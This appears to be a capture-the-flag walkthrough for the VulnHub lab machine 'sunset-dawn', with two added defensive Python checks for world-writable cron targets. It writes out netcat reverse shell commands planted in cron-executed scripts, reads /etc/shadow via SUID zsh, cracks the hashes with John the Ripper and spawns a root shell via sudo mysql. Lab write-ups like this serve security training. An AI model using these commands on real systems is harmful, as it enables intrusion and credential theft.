https://www.vulnhub.com/entry/sunset-dawn,341/
System Info
- Debian 10
Discover Target IP
- `sudo nmap -sn 192.168.122.1-255`
Scan Ports
- `nmap -p- 192.168.122.11`
- `nmap -p 80,139,445,3306 -sC -sV 192.168.122.11`
- `enum4linux -a 192.168.122.11`
Port 80
- `robots.txt` does not exist; using `dirb http://192.168.122.11` we can find http://192.168.122.11/logs/
- we can download `management.log` from it and take a look
SMB server
- Port 139 and port 445 indicate that there is an SMB server on the target machine
- use `smbclient -L //dawn` to list all of its services, and we can find the shared disk `ITDEPT`
- we can log into it with `smbclient //dawn/ITDEPT`
- now we are in the SMB share, but it is empty
- if we go back to reading that `management.log`, we can find lines like
```text
...
2022/11/08 13:29:02 CMD: UID=0 PID=666 | /usr/sbin/CRON -f
2022/11/08 13:29:02 CMD: UID=0 PID=669 | chmod 777 /home/dawn/ITDEPT/web-control
2022/11/08 13:30:01 CMD: UID=0 PID=671 | /usr/sbin/cron -f
2022/11/08 13:30:01 CMD: UID=0 PID=670 | /usr/sbin/CRON -f
2022/11/08 13:30:01 CMD: UID=0 PID=675 | /usr/sbin/CRON -f
2022/11/08 13:30:01 CMD: UID=0 PID=674 | /usr/sbin/cron -f
2022/11/08 13:30:01 CMD: UID=0 PID=673 | /usr/sbin/cron -f
2022/11/08 13:30:01 CMD: UID=0 PID=672 | /usr/sbin/CRON -f
2022/11/08 13:30:01 CMD: UID=0 PID=676 | /usr/sbin/CRON -f
2022/11/08 13:30:01 CMD: UID=0 PID=677 | /usr/sbin/CRON -f
2022/11/08 13:30:01 CMD: UID=0 PID=678 | /usr/sbin/CRON -f
2022/11/08 13:30:01 CMD: UID=0 PID=682 | /usr/sbin/CRON -f
2022/11/08 13:30:01 CMD: UID=0 PID=681 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/11/08 13:30:01 CMD: UID=1000 PID=680 | /bin/sh -c /home/dawn/ITDEPT/product-control
2022/11/08 13:30:01 CMD: UID=0 PID=679 | /usr/sbin/CRON -f
2022/11/08 13:30:01 CMD: UID=33 PID=685 | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/11/08 13:30:01 CMD: UID=??? PID=684 | ???
...
```
which indicates that there are cron jobs running every few minutes: they change the permissions of `/home/dawn/ITDEPT/web-control` and `/home/dawn/ITDEPT/product-control` to 777, and then run them through `/bin/sh -c` as UID=33 and UID=1000 respectively; the former is probably a daemon user like `www-data` and the latter is a normal user on the target system.
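As an added detection example (not part of the original walkthrough), a small Python parser over constructed log lines in the same format as the excerpt above; it flags any file that root has made world-writable and that some process later executes, which is exactly the pattern the log reveals:

```python
import re

# Constructed sample lines in the style of the management.log excerpt above
# (timestamp, UID, PID, command); not copied from a real host.
SAMPLE_LOG = """\
2022/11/08 13:29:02 CMD: UID=0 PID=666 | /usr/sbin/CRON -f
2022/11/08 13:29:02 CMD: UID=0 PID=669 | chmod 777 /home/dawn/ITDEPT/web-control
2022/11/08 13:30:01 CMD: UID=0 PID=681 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/11/08 13:30:01 CMD: UID=1000 PID=680 | /bin/sh -c /home/dawn/ITDEPT/product-control
2022/11/08 13:30:01 CMD: UID=33 PID=685 | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/11/08 13:30:01 CMD: UID=0 PID=690 | chmod 750 /var/backups/nightly.sh
2022/11/08 13:30:01 CMD: UID=0 PID=691 | /bin/sh -c /var/backups/nightly.sh
2022/11/08 13:30:01 CMD: UID=??? PID=684 | ???
"""

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) CMD: UID=(?P<uid>\d+) PID=(?P<pid>\d+) \| (?P<cmd>.*)$")
CHMOD_RE = re.compile(r"\bchmod\s+(?:-\S+\s+)*(?P<mode>\S+)\s+(?P<path>/\S+)")

def is_world_writable_mode(mode):
    """True for an octal mode whose 'other' write bit is set, or a symbolic grant of w to o/a/everyone."""
    if mode.isdigit():
        return mode[-1] in "2367"          # octal digits that include the write bit
    for clause in mode.split(","):
        parts = re.split(r"[+=]", clause, maxsplit=1)   # 'o+w' -> ['o', 'w']; '-w' clauses are ignored
        if len(parts) == 2 and "w" in parts[1] and (parts[0] == "" or set(parts[0]) & {"a", "o"}):
            return True
    return False

def parse(log_text):
    """Yield one dict per well-formed CMD line; malformed lines (e.g. 'UID=???') are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield {"ts": m["ts"], "uid": int(m["uid"]), "pid": int(m["pid"]), "cmd": m["cmd"]}

def find_writable_then_executed(log_text):
    """Flag files that root chmod-ed world-writable and that any uid later executed.
    Returns (path, chmod_uid, exec_uid) tuples in log order."""
    loosened = {}   # absolute path -> uid that loosened it
    findings = []
    for ev in parse(log_text):
        m = CHMOD_RE.search(ev["cmd"])
        if m:
            if ev["uid"] == 0 and is_world_writable_mode(m["mode"]):
                loosened[m["path"]] = ev["uid"]
            continue
        for path, chmod_uid in loosened.items():
            if path in ev["cmd"]:
                findings.append((path, chmod_uid, ev["uid"]))
    return findings
```

On the sample above the two `ITDEPT` scripts are reported while the 750-mode backup script is not; the same logic applies to real pspy-style output once the colour codes are stripped.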
Reverse shell
- we can create our own `web-control` and `product-control` bash scripts and add `nc -nv 192.168.122.101 9393 -e /bin/bash` to them to open a reverse shell
- connect to the SMB share and upload the file with `put product-control`
- exit the share, open a listening port on the attacker's machine with `ncat -nvlp 9393` and just wait
Exploring the system
- now we have a reverse shell as user `dawn`; spawn a better shell with `python3 -c 'import pty;pty.spawn("/bin/bash")'`
- if we search for all the files that belong to `root` and have the SUID bit set with `find / -user root -perm -4000 -type f 2>/dev/null`, we will find some binaries that normal users can run with root permissions.
Privilege Escalation
- just running `zsh` will give us root, since `/usr/bin/zsh` is among those SUID binaries
- if we check out https://gtfobins.github.io/gtfobins/zsh/#file-read, there is a way for us to read restricted files using Zsh: `export LFILE=/etc/shadow` sets the `/etc/shadow` file as the environment variable `LFILE`
- now we can read it using `zsh -c 'echo "$(<$LFILE)"'`
- we can redirect the output into another file: `zsh -c 'echo "$(<$LFILE)"' > shadowfile`
- get it back to the attacker's machine by starting an HTTP server or moving it into the `~/ITDEPT/` SMB shared directory; we will also need to copy `/etc/passwd` too
Cracking passwords
- now we have both the `/etc/passwd` and `/etc/shadow` files of the target system, so we can try to crack them
- first we need to combine both files using `unshadow passwd shadowfile > unshadowed`
- then we can crack it using John the Ripper: `john unshadowed --show`
Rooting the system
- now we can log in as `ganimedes` with password `sunshine`
- check out their home directory; if we take a look at their `.bash_history` file, we can find a passphrase like `thisisareallysecurepasswordnooneisgoingtoeverfind`
- if we try to use it on different users, we can log in as `root`!
MySQL
- run `sudo -l` and we can see
```text
...
User dawn may run the following commands on dawn:
    (root) NOPASSWD: /usr/bin/mysql
```
- if we take a look at user `dawn`'s bash history file, we can find a line like this
```text
...
echo "$1$$bOKpT2ijO.XcGlpjgAup9/"
...
```
- it seems to be a hashed password; if we use `hashid` or `hash-identifier`, we learn that it is MD5 Crypt
- we can try to crack it using John the Ripper with a bigger wordlist, `rockyou`: `john dawn.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt`, and we get `dawn`'s password: `onii-chan29`
- now we can use MySQL to execute bash as root with `dawn`'s password: `sudo mysql -u root -p -e '\! /bin/bash'`
- now we are `root`
Phobos
- if we take a look at `management.log` again, we can find another cron job in there, which points into user `ganimedes`'s home directory and is executed by `root` (UID = 0)
```text
...
2022/11/11 15:02:01 CMD: UID=0 PID=1501 | /bin/sh -c /home/ganimedes/phobos
...
```
- the file `phobos` doesn't exist right now, so we can create our own reverse shell script and it will connect us as root: `echo "nc -nv 192.168.122.101 9123 -e /bin/bash" > phobos && chmod +x phobos`
- open a listening port on the attacker's machine: `ncat -nvlp 9123`
- now we have a root shell
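As an added defender-side check (not part of the walkthrough), a Python audit of where a privileged cron entry points: it distinguishes a target that is missing inside a directory another user can write to, like `/home/ganimedes/phobos` above, from one that merely exists with loose permissions like the `ITDEPT` scripts; the temporary tree and the `trusted_uid` parameter are constructed for the demo so it runs unprivileged.

```python
import os
import shlex
import tempfile

def command_target(cmd):
    """First absolute path in a cron command, skipping an interpreter prefix such as '/bin/sh -c'.
    Assumes the command is simple enough for shlex (a simplification made for this example)."""
    try:
        toks = shlex.split(cmd)
    except ValueError:
        return None
    if len(toks) >= 3 and os.path.basename(toks[0]) in ("sh", "bash") and toks[1] == "-c":
        toks = toks[2].split()
    return next((t for t in toks if t.startswith("/")), None)

def audit_cron_target(path, trusted_uid=0):
    """Classify the file a privileged cron entry runs; trusted_uid is the uid that should own it."""
    others_w = 0o022                      # group and other write bits
    if not os.path.lexists(path):
        try:
            st = os.stat(os.path.dirname(path) or "/")
        except FileNotFoundError:
            return "missing"
        # an absent target in a directory someone else can write to: they can simply create it
        return "missing-creatable" if (st.st_uid != trusted_uid or st.st_mode & others_w) else "missing"
    st = os.stat(path)
    if st.st_uid != trusted_uid:
        return "non-root-owner"
    if st.st_mode & others_w:
        return "writable-by-others"
    return "ok"

def demo_audit():
    """Constructed throwaway tree (not the target VM) reproducing the page's cases."""
    base = tempfile.mkdtemp()
    me = os.geteuid()                     # stands in for root so the demo runs unprivileged
    home = os.path.join(base, "home", "ganimedes")
    os.makedirs(home)
    os.chmod(home, 0o777)                 # a directory the cron user does not control
    loose, tight = os.path.join(base, "web-control"), os.path.join(base, "backup.sh")
    for p, mode in ((loose, 0o777), (tight, 0o750)):
        open(p, "w").close()
        os.chmod(p, mode)
    return {
        "phobos": audit_cron_target(os.path.join(home, "phobos"), me),
        "web-control": audit_cron_target(loose, me),
        "backup": audit_cron_target(tight, me),
        "foreign-owner": audit_cron_target(tight, me + 1),
    }
```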
Capture The Flag
- `cat /root/flag.txt`